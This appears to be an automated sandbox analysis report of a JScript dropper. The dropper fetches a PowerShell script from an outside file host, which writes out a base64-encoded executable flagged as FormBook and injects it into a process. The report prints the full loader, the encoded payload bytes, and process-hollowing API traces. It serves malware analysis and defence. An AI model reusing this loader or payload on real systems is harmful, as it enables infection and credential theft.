                                                    Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEADZU+7gAAAAAAAAAAOAADiELAQYAAGAAAAAKAAAAAAAATn4AAAAgAAAAgAAAAABAAAAgAAAAAgA
                                                    2024-12-19 06:50:14 UTC16384INData Raw: 68 4a 59 44 45 41 53 30 46 51 4e 33 4e 35 5a 32 55 35 51 6b 78 6d 4d 6e 64 72 53 30 39 68 41 47 45 35 51 6a 5a 45 62 32 4a 4a 4d 31 5a 44 4e 55 67 31 51 32 35 52 4e 51 42 4e 65 56 4e 6c 64 48 52 70 62 6d 64 7a 41 45 5a 53 52 55 46 4c 57 53 35 4e 65 51 42 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 4e 6c 64 48 52 70 62 6d 64 7a 51 6d 46 7a 5a 51 42 54 65 58 4e 30 5a 57 30 75 51 32 39 75 5a 6d 6c 6e 64 58 4a 68 64 47 6c 76 62 67 42 4e 65 56 4e 6c 64 48 52 70 62 6d 64 7a 55 48 4a 76 63 47 56 79 64 48 6b 41 55 6e 56 75 55 45 55 41 65 46 64 56 4f 54 68 57 5a 6c 45 78 62 6d 56 71 61 31 4a 45 64 6e 64 4f 41 45 31 31 62 48 52 70 59 32 46 7a 64 45 52 6c 62 47 56 6e 59 58 52 6c 41 45 64 4d 62 58 56 51 64 55 39 79 55 30 78 6f 56 58 52 30 63 6d 39 47 63 51 42 49 59
                                                    Data Ascii: hJYDEAS0FQN3N5Z2U5QkxmMndrS09hAGE5QjZEb2JJM1ZDNUg1Q25RNQBNeVNldHRpbmdzAEZSRUFLWS5NeQBBcHBsaWNhdGlvblNldHRpbmdzQmFzZQBTeXN0ZW0uQ29uZmlndXJhdGlvbgBNeVNldHRpbmdzUHJvcGVydHkAUnVuUEUAeFdVOThWZlExbmVqa1JEdndOAE11bHRpY2FzdERlbGVnYXRlAEdMbXVQdU9yU0xoVXR0cm9GcQBIY
                                                    2024-12-19 06:50:14 UTC5338INData Raw: 4a 6a 5a 57 35 30 52 33 4a 76 64 58 42 54 5a 58 42 68 63 6d 46 30 62 33 49 4e 63 47 56 79 59 32 56 75 64 46 4e 35 62 57 4a 76 62 41 35 77 5a 58 4a 4e 61 57 78 73 5a 56 4e 35 62 57 4a 76 62 41 78 75 59 58 52 70 64 6d 56 45 61 57 64 70 64 48 4d 4b 62 56 39 6b 59 58 52 68 53 58 52 6c 62 52 4e 75 64 57 31 69 5a 58 4a 45 5a 57 4e 70 62 57 46 73 52 47 6c 6e 61 58 52 7a 46 57 4e 31 63 6e 4a 6c 62 6d 4e 35 52 47 56 6a 61 57 31 68 62 45 52 70 5a 32 6c 30 63 78 64 6a 64 58 4a 79 5a 57 35 6a 65 56 42 76 63 32 6c 30 61 58 5a 6c 55 47 46 30 64 47 56 79 62 68 64 6a 64 58 4a 79 5a 57 35 6a 65 55 35 6c 5a 32 46 30 61 58 5a 6c 55 47 46 30 64 47 56 79 62 68 56 75 64 57 31 69 5a 58 4a 4f 5a 57 64 68 64 47 6c 32 5a 56 42 68 64 48 52 6c 63 6d 34 57 63 47 56 79 59 32 56 75 64
                                                    Data Ascii: JjZW50R3JvdXBTZXBhcmF0b3INcGVyY2VudFN5bWJvbA5wZXJNaWxsZVN5bWJvbAxuYXRpdmVEaWdpdHMKbV9kYXRhSXRlbRNudW1iZXJEZWNpbWFsRGlnaXRzFWN1cnJlbmN5RGVjaW1hbERpZ2l0cxdjdXJyZW5jeVBvc2l0aXZlUGF0dGVybhdjdXJyZW5jeU5lZ2F0aXZlUGF0dGVybhVudW1iZXJOZWdhdGl2ZVBhdHRlcm4WcGVyY2Vud


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:01:50:01
                                                    Start date:19/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js"
                                                    Imagebase:0x7ff6c7970000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:01:50:04
                                                    Start date:19/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:01:50:04
                                                    Start date:19/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:01:50:07
                                                    Start date:19/12/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                    Imagebase:0xaf0000
                                                    File size:10'752 bytes
                                                    MD5 hash:DF1F48D5D5C174AA6AB5910BB41064FB
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:01:50:13
                                                    Start date:19/12/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                    Imagebase:0xf70000
                                                    File size:10'752 bytes
                                                    MD5 hash:DF1F48D5D5C174AA6AB5910BB41064FB
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Call Graph

                                                    • Executed
                                                    • Not Executed
                                                    callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C0 clusterC8C0 clusterC10C0 clusterC12C0 clusterC14C12 clusterC16C12 clusterC18C12 clusterC20C12 clusterC22C12 clusterC28C0 clusterC30C28 clusterC24C0 clusterC26C24 clusterC32C0 E1C0 entry:C0 F3C2 CreateObject E1C0->F3C2 F5C4 CreateObject E1C0->F5C4 F7C6 CreateObject E1C0->F7C6 F9C8 FolderExists E1C0->F9C8 F11C10 CreateFolder E1C0->F11C10 F13C12 DownloadScript E1C0->F13C12 F25C24 LogError E1C0->F25C24 F29C28 RunPowerShellScript E1C0->F29C28 F33C32 Quit E1C0->F33C32 F15C14 Open F13C12->F15C14 F17C16 Send F13C12->F17C16 F19C18 CreateTextFile F13C12->F19C18 F21C20 Write F13C12->F21C20 F23C22 Close F13C12->F23C22 F13C12->F25C24 F27C26 Echo F25C24->F27C26 F29C28->F25C24 F31C30 Run F29C28->F31C30

                                                    Script:

                                                    Code
                                                    0
                                                    var URL = "https://files.catbox.moe/ugok5m.ps1";
                                                      1
                                                      var DownloadPath = "C:\\Temp\\dddddd.ps1";
                                                        2
                                                        var TEMP_DIR = "C:\\Temp";
                                                          3
                                                          var SUCCESS_STATUS = 200;
                                                            4
                                                            var POWERSHELL_CMD = "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ";
                                                              5
                                                              var shell = WScript.CreateObject ( "WScript.Shell" );
                                                              • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                              6
                                                              var fileSystem = WScript.CreateObject ( "Scripting.FileSystemObject" );
                                                              • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                              7
                                                              var http = WScript.CreateObject ( "MSXML2.XMLHTTP" );
                                                              • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                              8
                                                              if ( ! fileSystem.FolderExists ( TEMP_DIR ) )
                                                              • FolderExists("C:\Temp") ➔ false
                                                              9
                                                              {
                                                                10
                                                                fileSystem.CreateFolder ( TEMP_DIR );
                                                                • CreateFolder("C:\Temp") ➔ C:\Temp
                                                                11
                                                                }
                                                                  12
                                                                  function DownloadScript(url, path) {
                                                                  • DownloadScript("https://files.catbox.moe/ugok5m.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                  13
                                                                  try
                                                                    14
                                                                    {
                                                                      15
                                                                      http.Open ( "GET", url, false );
                                                                      • Open("GET","https://files.catbox.moe/ugok5m.ps1",false) ➔ undefined
                                                                      16
                                                                      http.Send ( );
                                                                      • Send() ➔ undefined
                                                                      17
                                                                      if ( http.Status === SUCCESS_STATUS )
                                                                        18
                                                                        {
                                                                          19
                                                                          var file = fileSystem.CreateTextFile ( path, true );
                                                                          • CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
                                                                          20
                                                                          file.Write ( http.ResponseText );
                                                                          • Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAQjhdcAAAAAAAAAAOAALgELAQYAACAAAAAIAAAAAAAADj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMA+AABLAAAAAEAAAJgFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB4PgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAFB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADwPgAAAAAAAEgAAAACAAUAUCkAAHAUAAADAAIAEAAABsA9AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYrAiYWKwImFgIoBQAABgAAKgAAEzADANYAAAABAAARKwImFiAAAAAAOGcAAAAHgAEAAAQgBQAAADhXAAAAAH4BAAAEFP4BCigGAAAGKAcAAAY6aAAAACYgBAAAACgGAAAGOi4AAAAmAHIBAABw0AMAAAIoCAAABm8PAAAKcxAAAAoLODIAAAAgAAAAAP4OAwD+DAMARQgAAACE////EAAAAHT///8AAAAAEAAAACIAAACu////NQAAADhv////JiACAAAAOMv///8GOQ0AAAAgBgAAABY5uv///yYAfgEAAAQMIAcAAAAXOqf///8mOAAAAAAIKgAAEzACABIAAAACAAARKwImFgB+AgAABAo4AAAAAAYqAAAyKwImFgACgAIAAAQqAAAAOisCJhb+CQAAKBEAAAoqABorAiYWFyoAGisCJhYWKgA+KwImFgD+CQAAKBIAAAoqEzACABIAAAADAAARKwImFgB+AwAABAo4AAAAAAYqAABCKwImFisCJhYCKA4AAAYAKgAAAHYrAiYWKwImFnMKAAAGKA8AAAZ0BAAAAoADAAAEKgAAGisCJhYXKgAaKwImFhYqADorAiYW/gkAACgTAAAKKgA+KwImFgD+CQAAKBQAAAoqGzAFAOcBAAAEAAARKwImFiAEAAAAODcAAAAAONIBAAAg8A8AACgVAAAKIAYAAAA4HQAAAAByOQAAcCgWAAAKOC4AAAAgBAAAAP4OCgD+DAoARQcAAAAQAAAAwv///8L///8AAAAAPgAAAKj///9TAAAAOKP///8mIAUAAAA4z////ygVAAAGOAEAAAAXCgY5jP///ygWAAAGKBcAAAY61P///yYgAQAAABY5ov///yYAKBQAAAY60f///yAAAAAAOIz///8AAHKDAABwKBIAAAYLIAMAAAA4TgAAAAcoFwAACgwWKBYAAAY5wQAAACYgBQAAADgxAAAAAHLLAABwKBYAAAogCAAAABc6GwAAACYJKBgAAAoTBDiBAAAAIAMAAAD+DgkA/gwJAEUJAAAACgAAAGcAAAC9////if///1cAAABnAAAASwAAAKb///93AAAAIAYAAAA4zf///xqNFAAAASUWEQWiJRd+GQAACqIlGAiiJRkXjAQAAAGiEwYRBBEGKBEAAAYW/gETBxEHOTgAAAAgBwAAADiM////KBoAAApvGwAAChMFOK7///8mIAAAAAA4cP///ygTAAAGDSACAAAAOGD///8AAADdIAAAABMIAHLxAABwEQhvHAAACigdAAAKKBYAAAoAAN0AAAAAKgBBHAAAAAAAALoAAAAMAQAAxgEAACAAAAAdAAABGzAHAJ0BAAAFAAARKwImFiABAAAAKBcAAAY5QgEAACY4IQEAAAAAAnIZAQBwKBgAAAYlOh4AAAAmFygXAAAGOlUAAAAmIAMAAAAWOSsAAAAmOE4AAAByMwEAcCAAAQAAFBQDKB4AAAomOCYAAAAgAwAAAP4OBQD+DAUARQUAAAC9////AAAAABAAAAC9////JAAAADgLAAAAJiACAAAAONf///9yPwEAcCgZAAAGIAQAAAA4w////wAXC93nAAAADAByawEAcAaMAwAAAQgoGgAABigbAAAGKBkAAAYABhn+BA0JORgAAAAAcpsBAHAoFgAACgAg0AcAACgfAAAKAAAA3QAAAAAABhdYCiAGAAAAOEsAAAARBDoI////OBgAAAAmIAAAAAA4NAAAAAAXCiACAAAAOCcAAAAWCyAHAAAAOBsAAAAGGf4CFv4BEwQ4MgAAACABAAAA/g4GAP4MBgBFCAAAALT///+n////mv7//5D///+X////kP///8D///8cAAAAFygXAAAGOpH///8mIAUAAAAoFgAABjrA////JjgAAAAAByoAAAABEAAAAAAaAJq0AEcdAAABGzADANkAAAAGAAARKwImFigWAAAGKBcAAAY6ZwAAACYgAgAAACgWAAAGOh4AAAAmBnKzAQBwbyAAAAo4UQAAACACAAAA/g4EAP4MBABFBgAAAAoAAAAXAAAACgAAACcAAADG////PwAAACADAAAAONn///8AAigcAAAGdCUAAAEKOKr///8mIAQAAAA4vP///wAGbyEAAAoLIAUAAAAoFgAABjql////JgdvIgAACigdAAAGcyMAAAoMAAhvJAAACg3dHAAAAAg5BwAAAAhvJQAACgDcBzkHAAAABygeAAAGANwJKgAAAAEcAAACAK4ADbsADgAAAAACAJ0ALMkADgAAAAATMAMAkQAAAAcAABErAiYWFigWAAAGOW4AAAAmIAEAAAAoFgAABjo8AAAAJgByuwEAcAogAwAAADgqAAAABygXAAAKDCAFAAAAOBkAAAAGKBIAAAYLOCoAAAAgAQAAAP4OAwD+DAMARQYAAACo////qP///wAAAADK////uf///xIAAAA4tP///yYgBAAAABY50v///yY4AAAAAAgqAAAAEzACACIAAAAIAAARKwImFgAoJgAACjoKAAAAKB8AAAY4AQAAABcKOAAAAAAGKgAAEzADAM0AAAAJAAARKwImFhYoFgAABjlxAAAAJiABAAAAOEQAAAAoJwAACnIDAgBwKCAAAAY6kAAAACAFAAAAOCYAAAAoKAAACnITAgBwbykAAAo6eAAAADgqAAAAIAEAAAD+DgEA/gwBAEUGAAAAEAAAABAAAAAAAAAAvf///5////8vAAAAOJr///8mIAQAAAA40////wAoKAAACnIDAgBwKCAAAAY6JAAAACADAAAAOLT///8oJwAACnITAgBwbykAAAo4AQAAABc4AQAAABcKOAAAAAAGKgAAABorAiYWFyoAGisCJhYWKgBKKwImFv4JAAD+CQEAbyoAAAoqAD4rAiYWAP4JAAAoFgAACio6KwImFv4JAABvHAAACioAXisCJhYA/gkAAP4JAQD+CQIAKCsAAAoqPisCJhYA/gkAACgsAAAKKi4rAiYWACgtAAAKKjorAiYW/gkAAG8lAAAKKgAuKwImFgAoLgAACipKKwImFv4JAAD+CQEAbykAAAoqAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAAwGAAAjfgAAeAYAAKAIAAAjU3RyaW5ncwAAAAAYDwAAHAIAACNVUwA0EQAAEAAAACNHVUlEAAAARBEAACwDAAAjQ") ➔ undefined
                                                                          21
                                                                          file.Close ( );
                                                                          • Close() ➔ undefined
                                                                          22
                                                                          return true;
                                                                            23
                                                                            }
                                                                              24
                                                                              else
                                                                                25
                                                                                {
                                                                                  26
                                                                                  LogError ( "Download failed with status: " + http.Status );
                                                                                    27
                                                                                    return false;
                                                                                      28
                                                                                      }
                                                                                        29
                                                                                        }
                                                                                          30
                                                                                          catch ( e )
                                                                                            31
                                                                                            {
                                                                                              32
                                                                                              LogError ( "Error downloading script: " + e.message );
                                                                                                33
                                                                                                return false;
                                                                                                  34
                                                                                                  }
                                                                                                    35
                                                                                                    }
                                                                                                      36
                                                                                                      function LogError(message) {
                                                                                                        37
                                                                                                        WScript.Echo ( message );
                                                                                                          38
                                                                                                          }
                                                                                                            39
                                                                                                            function RunPowerShellScript(scriptPath) {
                                                                                                            • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                            40
                                                                                                            try
                                                                                                              41
                                                                                                              {
                                                                                                                42
                                                                                                                var powerShellCommand = POWERSHELL_CMD + "\"" + scriptPath + "\"";
                                                                                                                  43
                                                                                                                  shell.Run ( powerShellCommand, 0, true );
                                                                                                                  • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
                                                                                                                  44
                                                                                                                  }
                                                                                                                    45
                                                                                                                    catch ( e )
                                                                                                                      46
                                                                                                                      {
                                                                                                                        47
                                                                                                                        LogError ( "Failed to execute PowerShell script: " + e.message );
                                                                                                                          48
                                                                                                                          }
                                                                                                                            49
                                                                                                                            }
                                                                                                                              50
                                                                                                                              if ( DownloadScript ( URL, DownloadPath ) )
                                                                                                                              • DownloadScript("https://files.catbox.moe/ugok5m.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                              51
                                                                                                                              {
                                                                                                                                52
                                                                                                                                RunPowerShellScript ( DownloadPath );
                                                                                                                                • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                53
                                                                                                                                }
                                                                                                                                  54
                                                                                                                                  else
                                                                                                                                    55
                                                                                                                                    {
                                                                                                                                      56
                                                                                                                                      LogError ( "Exiting script due to download failure." );
                                                                                                                                        57
                                                                                                                                        WScript.Quit ( );
                                                                                                                                          58
                                                                                                                                          }
                                                                                                                                            Reset < >
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1805665116.00007FFD9B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffd9b5e0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1ed20a3bbb7c1747feb5a31222d4429bba0bf2573911fffaf161108d66df9e2c
                                                                                                                                              • Instruction ID: 0cb64553e75cabda11aaf4c0762a84bd8deb5598bf2d97283b8cc2caaf02338d
                                                                                                                                              • Opcode Fuzzy Hash: 1ed20a3bbb7c1747feb5a31222d4429bba0bf2573911fffaf161108d66df9e2c
                                                                                                                                              • Instruction Fuzzy Hash: A6921462A0EBC91FE7E7DB6848666657BE1EF56610F0E01FBD088CB0E3D918AD05C351
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1805665116.00007FFD9B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffd9b5e0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0edff9ad28010bd180337e6ae09093876e14f758cb97306e02ab5874ea03aa4c
                                                                                                                                              • Instruction ID: 5ade34ccce914b35877335007e39044727c6aef0b2472daa74edc9a1b8fcc780
                                                                                                                                              • Opcode Fuzzy Hash: 0edff9ad28010bd180337e6ae09093876e14f758cb97306e02ab5874ea03aa4c
                                                                                                                                              • Instruction Fuzzy Hash: 4C11C822F1E90E5BE6FED258647717952C1EF94B10B8E01B9E84DC21E7DE186D4182C1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1805256616.00007FFD9B510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffd9b510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                              • Instruction ID: ec7eb3999733a90e561267c7f67114b4c98ec2467302e526c473d2f43ce5d7c7
                                                                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                              • Instruction Fuzzy Hash: E001AC7010CB0D4FD744DF0CD051AA5B3E0FB95320F10056DE58AC3561D632E982C741

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:27.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:75%
                                                                                                                                              Total number of Nodes:32
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 3872 1454190 3873 14541ad 3872->3873 3876 145422e 3873->3876 3877 145426b 3876->3877 3902 1455344 3877->3902 3906 1455350 3877->3906 3878 145494e 3879 1454a5d 3878->3879 3892 1455be0 Wow64SetThreadContext 3878->3892 3893 1455862 Wow64SetThreadContext 3878->3893 3888 1456090 VirtualAllocEx 3879->3888 3889 1456088 VirtualAllocEx 3879->3889 3880 1454ca7 3894 1455e30 WriteProcessMemory 3880->3894 3895 1455e38 WriteProcessMemory 3880->3895 3881 145502e 3900 1455e30 WriteProcessMemory 3881->3900 3901 1455e38 WriteProcessMemory 3881->3901 3882 1455080 3883 145518e 3882->3883 3890 1455be0 Wow64SetThreadContext 3882->3890 3891 1455862 Wow64SetThreadContext 3882->3891 3886 14561b0 ResumeThread 3883->3886 3887 14561a8 ResumeThread 3883->3887 3884 1454da2 3884->3881 3898 1455e30 WriteProcessMemory 3884->3898 3899 1455e38 WriteProcessMemory 3884->3899 3885 14541fd 3886->3885 3887->3885 3888->3880 3889->3880 3890->3883 3891->3883 3892->3879 3893->3879 3894->3884 3895->3884 3898->3884 3899->3884 3900->3882 3901->3882 3903 14553d7 CreateProcessA 3902->3903 3905 145562c 3903->3905 3905->3905 3907 14553d7 CreateProcessA 3906->3907 3909 145562c 3907->3909

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 315 145422e-1454269 316 1454270-14542c1 315->316 317 145426b 315->317 318 14542dc-14542e0 316->318 317->316 319 14542c3-14542d5 318->319 320 14542e2-14548b4 call 1452340 * 12 call 1452528 * 10 318->320 319->318 321 14542d7 319->321 406 14548b6 320->406 407 14548bb-14548f0 320->407 321->318 406->407 409 14548f2-145491b 407->409 410 145491c-1454949 407->410 409->410 562 145494c call 1455344 410->562 563 145494c call 1455350 410->563 412 145494e-145496e 413 1454996-14549c2 412->413 414 1454970-145498b 412->414 417 14549c4 413->417 418 14549c9-1454a0e 413->418 414->413 417->418 422 1454a15-1454a41 418->422 423 1454a10 418->423 425 1454a43-1454a58 422->425 426 1454aa9-1454ae4 422->426 423->422 558 1454a5b call 1455be0 425->558 559 1454a5b call 1455862 425->559 431 1454ae6-1454b01 426->431 432 1454b0c 426->432 427 1454a5d-1454a7d 429 1454aa5-1454aa7 427->429 430 1454a7f-1454a9a 427->430 433 1454b0d-1454b17 429->433 430->429 431->432 432->433 435 1454b1e-1454b37 433->435 436 1454b19 433->436 438 1454b3e-1454b7d 435->438 439 1454b39 435->439 436->435 443 1454ba5-1454bc4 438->443 444 1454b7f-1454b9a 438->444 439->438 445 1454c26-1454c34 443->445 446 1454bc6-1454bfd 443->446 444->443 447 1454c36 445->447 448 1454c3b-1454c62 445->448 453 1454c25 446->453 454 1454bff-1454c1a 446->454 447->448 455 1454c64 448->455 456 1454c69-1454ca2 448->456 453->445 454->453 455->456 554 1454ca5 call 1456090 456->554 555 1454ca5 call 1456088 456->555 460 1454ca7-1454cbf 461 1454cd7-1454cd9 460->461 462 1454cc1-1454cd5 460->462 463 1454cdf-1454cf3 461->463 462->463 464 1454cf5-1454d37 463->464 465 1454d38-1454d53 463->465 464->465 466 1454d55-1454d70 465->466 467 1454d7b-1454d9d 465->467 466->467 560 1454da0 call 1455e30 467->560 561 1454da0 call 1455e38 467->561 470 1454da2-1454dc2 471 1454dc4-1454ddf 470->471 472 1454dea-1454df7 470->472 471->472 473 1454dfe-1454e11 472->473 474 1454df9 472->474 476 1454e13 473->476 477 1454e18-1454e40 473->477 474->473 476->477 481 1454e47-1454e56 477->481 482 1454e42 477->482 483 145501c-1455028 481->483 482->481 484 145502e-1455058 483->484 485 1454e5b-1454e68 483->485 490 145505f-145507b 484->490 491 145505a 484->491 486 1454e6f-1454e96 485->486 487 1454e6a 485->487 492 1454e9d-1454ec4 486->492 493 1454e98 486->493 487->486 566 145507e call 1455e30 490->566 567 145507e call 1455e38 490->567 491->490 498 1454ec6 492->498 499 1454ecb-1454eff 492->499 493->492 494 1455080-14550a0 495 14550a2-14550bd 494->495 496 14550c8-14550d5 494->496 495->496 500 14550d7 496->500 501 14550dc-1455109 496->501 498->499 508 1454f05-1454f12 499->508 509 1454fe7-1454ff5 499->509 500->501 505 1455117-1455123 501->505 506 145510b-1455111 501->506 510 1455125 505->510 511 145512a-145513a 505->511 506->505 514 1454f14 508->514 515 1454f19-1454f20 508->515 512 1454ff7 509->512 513 1454ffc-145500f 509->513 510->511 518 1455141-1455172 511->518 519 145513c 511->519 512->513 520 1455016 513->520 521 1455011 513->521 514->515 516 1454f27-1454f6f 515->516 517 1454f22 515->517 528 1454f76-1454f99 516->528 529 1454f71 516->529 517->516 524 1455174-1455189 518->524 525 14551da-1455215 518->525 519->518 520->483 521->520 556 145518c call 1455be0 524->556 557 145518c call 1455862 524->557 531 1455217-1455232 525->531 532 145523d 525->532 564 1454f9c call 1455e30 528->564 565 1454f9c call 1455e38 528->565 529->528 530 145518e-14551ae 533 14551d6-14551d8 530->533 534 14551b0-14551cb 530->534 531->532 535 145523e-145524d 532->535 533->535 534->533 552 1455250 call 14561b0 535->552 553 1455250 call 14561a8 535->553 536 1454f9e-1454fbe 538 1454fe6 536->538 539 1454fc0-1454fdb 536->539 538->509 539->538 541 1455252-1455272 542 1455274-145528f 541->542 543 145529a-1455337 541->543 542->543 552->541 553->541 554->460 555->460 556->530 557->530 558->427 559->427 560->470 561->470 562->412 563->412 564->536 565->536 566->494 567->494
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.1841708304.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_1450000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7f57f0951b7de478b9664198f5bf8874df6254022b4db8b3a14fd0a8efbb9288
                                                                                                                                              • Instruction ID: a5cdbc5f1c2fb5f3e4050b9f28eaea94b982f72cada852747ab276718bdf5960
                                                                                                                                              • Opcode Fuzzy Hash: 7f57f0951b7de478b9664198f5bf8874df6254022b4db8b3a14fd0a8efbb9288
